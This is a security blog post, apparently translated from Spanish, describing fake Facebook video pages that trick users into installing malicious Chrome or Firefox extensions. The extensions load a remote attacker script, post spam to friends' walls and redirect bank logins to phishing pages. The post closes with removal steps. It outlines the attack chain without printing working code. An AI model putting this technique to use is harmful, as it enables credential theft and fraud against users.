contadores de paginas web Saltar al contenido

Fake Facebook-propagated extensions used to send spam and bank phishing


In the last two weeks they have been circulating fake videos on Facebook that require the installation of a plugin or extensionThere are several variants depending on the attackers, but all are based on the same kit that allows them to install the malicious plugin and spread it on Facebook as spam.

It is an ingenious attack that reminds me of the practice of some movie sites that require a plugin in the browser to join the video and the subtitles in the same player, these plugins once installed show their own advertising modifying all the pages by which the user browses.

What they are doing with the fake Facebook videos is similar, the plugins that are installed can perform phishing attacks, download malware, display fraudulent advertising and send spam when victims are logged in somewhere like Facebook.

Let's see an example, the following is a fake YouTube page requesting the installation of a plugin to see a supposed video with girls:

Fake YouTube page and malicious plugin

You can see that the browser warns about the installation of the plugin, this point is crucial and it is what makes the difference between a compromised team or not. If the victim is carried away by what he sees on the screen (simple social engineer) install a malicious complement.

Now let's look at the code of this fake pageAt a glance you can see that a script verifies the browser that the user uses. The variables is_chrome and is_firefox start the downloads, if a different browser is used, a redirection is made to some page top.location.href = some-site-spam-with-advertising-spam:

Plugin for Firefox or Chrome

In the following screenshot you can see the warning received when starting the installation, simulates being a YouTube extension And while it's highly suspicious, most users ignore the danger:

Installing the malicious plugin

What does the plugin do?

As I mentioned at the beginning, there are many variants because the same codes are being used by various cyber criminals. They all have one thing in common and that is that take advantage of – or took advantage of – Facebook to spread, when a person with the plugin installed logs into their account, they are automatically published fake messages on the walls of your friends… a real spam disaster that turns viral because many of those friends also fall for it.

In the following screenshot you can see the plugin contentWhat it does is simply call a script that is located on a server controlled by the attacker, this allows you to update or modify it as you like:

The plugin loads an external script

The script called is the one that performs the malicious actions, the following screenshot shows one of the messages that it publishes on the walls. If you Google Facebook you go out in a video You can find dozens of complaints, posts and comments from victims:

Spam messages published by the plugin

But this script is not limited to posting messages, it also performs Phishing attacks to steal bank accounts. In the following screenshots you can see two functions that redirect to false pages:

When you access the real bank page, the pluginInstead, it loads another page that copies its design to trick the user into stealing their login credentials. The following screenshot shows one of these phishing pages loaded by the fake extension:

Phishing from a bank in Panama

In this case, only two entities are the target of the attack, but keep in mind that the attacker can update the script at any time and add more phishing pages.

How to remove the plugin?

Thousands of people have installed these plugins by mistake, in fact I think they are responsible for the problems that some advertising companies had a few days ago with the SMS subscription campaigns.

For remove plugin in Chrome you must click on the key located at the top right, then select Tools and Extensions. A page will open with the extensions installed in the browser and from there you have to delete it, in this case it is called YouTube Extension:

Eliminating the false extension

In Firefox it is similar, except that you must click on the menu Tools and then select Accessories.

Update 1: in TrendMicro I found a variant of the attack that simulates being a new navideo design for Facebook. Despite being the same script, it serves as an example of how ingenious they can be when it comes to infecting.

Update 2: In Websense they also published information about the attack, the video in this case pretends to be part of Facebook although if you look at the URL you can clearly see that it is on any other page.

Update 3: The fake sites commented on in the post are already blocked.


Keep in mind that there are so many more and attackers can modify scripts to update URLs.